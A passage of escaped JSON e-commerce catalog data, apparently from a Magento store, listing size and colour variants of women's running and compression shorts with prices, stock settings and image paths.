_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh06-gray_alt1.jpg,\\/w\\/s\\/wsh06-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh06-gray_alt1.jpg,\\/w\\/s\\/wsh06-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Gray\"},\"1941\":{\"sku\":\"WSH06-29-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Angel Light Running Short-29-Orange\",\"description\":\"<p>The Angel Light Running Short offers comfort in an ultra-lightweight, breathable package. With fabric infused with all-natural Cocona&reg; performance technology, it can whisk away sweat and block UV rays.<\\/p>\\n<p>&bull; Dark heather gray running shorts.<br \\/>&bull; Snug fit. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"angel-light-running-short-29-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh06-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh06-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh06-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh06-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh06-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Orange\"},\"1942\":{\"sku\":\"WSH06-29-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Angel Light Running Short-29-Purple\",\"description\":\"<p>The Angel Light Running Short offers comfort in an ultra-lightweight, breathable package. With fabric infused with all-natural Cocona&reg; performance technology, it can whisk away sweat and block UV rays.<\\/p>\\n<p>&bull; Dark heather gray running shorts.<br \\/>&bull; Snug fit. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"angel-light-running-short-29-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Purple\"},\"1943\":{\"sku\":\"WSH06\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Angel Light Running Short\",\"description\":\"<p>The Angel Light Running Short offers comfort in an ultra-lightweight, breathable package. With fabric infused with all-natural Cocona&reg; performance technology, it can whisk away sweat and block UV rays.<\\/p>\\n<p>&bull; Dark heather gray running shorts.<br \\/>&bull; Snug fit. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Basic|Snug,material=Cocona&reg; performance fabric|Mesh|Polyester,pattern=Solid,climate=All-weather|Indoor|Hot,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH06-28-Gray,size=28,color=Gray|sku=WSH06-28-Orange,size=28,color=Orange|sku=WSH06-28-Purple,size=28,color=Purple|sku=WSH06-29-Gray,size=29,color=Gray|sku=WSH06-29-Orange,size=29,color=Orange|sku=WSH06-29-Purple,size=29,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh06-gray_alt1.jpg,\\/w\\/s\\/wsh06-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh06-gray_alt1.jpg,\\/w\\/s\\/wsh06-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Basic|Snug\",\"material\":\"Cocona&reg; performance fabric|Mesh|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Hot\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1944\":{\"sku\":\"WSH07-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Echo Fit Compression Short-28-Black\",\"description\":\"<p>Your muscles know it\'s go time the second you pull on the Echo Fit Compression Short. A balance of firm, stimulating squeeze with breathability, it offers the support and comfort you need to give it your all.<\\/p>\\n<p>&bull; Black compression shorts.<br \\/>&bull; High-waisted cut.<br \\/>&bull; Compression fit.<br \\/>&bull; Inseam: 1.0\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"echo-fit-compression-short-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh07-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1945\":{\"sku\":\"WSH07-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Echo Fit Compression Short-28-Blue\",\"description\":\"<p>Your muscles know it\'s go time the second you pull on the Echo Fit Compression Short. A balance of firm, stimulating squeeze with breathability, it offers the support and comfort you need to give it your all.<\\/p>\\n<p>&bull; Black compression shorts.<br \\/>&bull; High-waisted cut.<br \\/>&bull; Compression fit.<br \\/>&bull; Inseam: 1.0\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"echo-fit-compression-short-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh07-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh07-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh07-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh07-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh07-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1946\":{\"sku\":\"WSH07-28-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Echo Fit Compression Short-28-Purple\",\"description\":\"<p>Your muscles know it\'s go time the second you pull on the Echo Fit Compression Short. A balance of firm, stimulating squeeze with breathability, it offers the support and comfort you need to give it your all.<\\/p>\\n<p>&bull; Black compression shorts.<br \\/>&bull; High-waisted cut.<br \\/>&bull; Compression fit.<br \\/>&bull; Inseam: 1.0\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"echo-fit-compression-short-28-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Purple\"},\"1947\":{\"sku\":\"WSH07-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Echo Fit Compression Short-29-Black\",\"description\":\"<p>Your muscles know it\'s go time the second you pull on the Echo Fit Compression Short. A balance of firm, stimulating squeeze with breathability, it offers the support and comfort you need to give it your all.<\\/p>\\n<p>&bull; Black compression shorts.<br \\/>&bull; High-waisted cut.<br \\/>&bull; Compression fit.<br \\/>&bull; Inseam: 1.0\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"echo-fit-compression-short-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh07-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1948\":{\"sku\":\"WSH07-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Echo Fit Compression Short-29-Blue\",\"description\":\"<p>Your muscles know it\'s go time the second you pull on the Echo Fit Compression Short. A balance of firm, stimulating squeeze with breathability, it offers the support and comfort you need to give it your all.<\\/p>\\n<p>&bull; Black compression shorts.<br \\/>&bull; High-waisted cut.<br \\/>&bull; Compression fit.<br \\/>&bull; Inseam: 1.0\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"echo-fit-compression-short-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh07-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh07-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh07-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh07-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh07-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1949\":{\"sku\":\"WSH07-29-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Echo Fit Compression Short-29-Purple\",\"description\":\"<p>Your muscles know it\'s go time the second you pull on the Echo Fit Compression Short. A balance of firm, stimulating squeeze with breathability, it offers the support and comfort you need to give it your all.<\\/p>\\n<p>&bull; Black compression shorts.<br \\/>&bull; High-waisted cut.<br \\/>&bull; Compression fit.<br \\/>&bull; Inseam: 1.0\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 